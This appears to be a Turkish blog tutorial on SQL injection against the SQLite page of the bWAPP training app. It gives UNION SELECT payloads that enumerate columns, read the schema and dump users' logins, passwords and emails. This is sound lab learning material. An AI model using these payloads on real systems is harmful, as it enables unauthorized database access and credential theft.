68mKJpIYt6QLWDrfo5B1gnz3gMbYPf4 İçeriğe geç

SQL Injection (SQLite) bWAPP

SQL Injection (SQLite) bWAPP

Herhangi bir film/dizi aratalım. ben Iron Man arattım.

Sql hatası almak için ‘ girdisiyle işlem yapalım.ve hata alalım

Ekranda görüldüğü gibi hatamızı aldık

Şimdi yapmamız gereken sütün sayısını bulmak order by metoduyla 7 de hata verdiğine göre 6 sütundan oluşuyor.

Sütun sayımızı bulduğumuza göre şifre sütunları sınıflandırmalıyız union select metoduyla.

iron ‘ union select 1,2,3,4,sqlite_version(),6– # 

Versiyonunu öğrendik şimdide sıra geldi tablolara ulaşmaya.

iron’ union select 1,2,3,4,sql,6 from sqlite_master — # Metodu ile veritabanı tablolarını görücez.

Veritabanı tablosu karşımıza geldi.

iron’ union select 1,email,3,4,login|| “:”||password,6 from users — # || bu ifade sqlite ‘ta dizeleri birleştirir. Yukarda görüldüğü gibi kullanıcı adı, şifre ve e-maillere eriştik.

Tarih:SQL Injection

3 Yorum

  1. İlkay İlkay

    Aradığım kaynak buydu gayet güzel ve sade anlatım elinize sağlık

  2. Ömer Ömer

    Emeğiniz için çok teşekkür ederim çok yardımcı oldunuz iyi çalışmalar

Bir cevap yazın

E-posta hesabınız yayımlanmayacak. Gerekli alanlar * ile işaretlenmişlerdir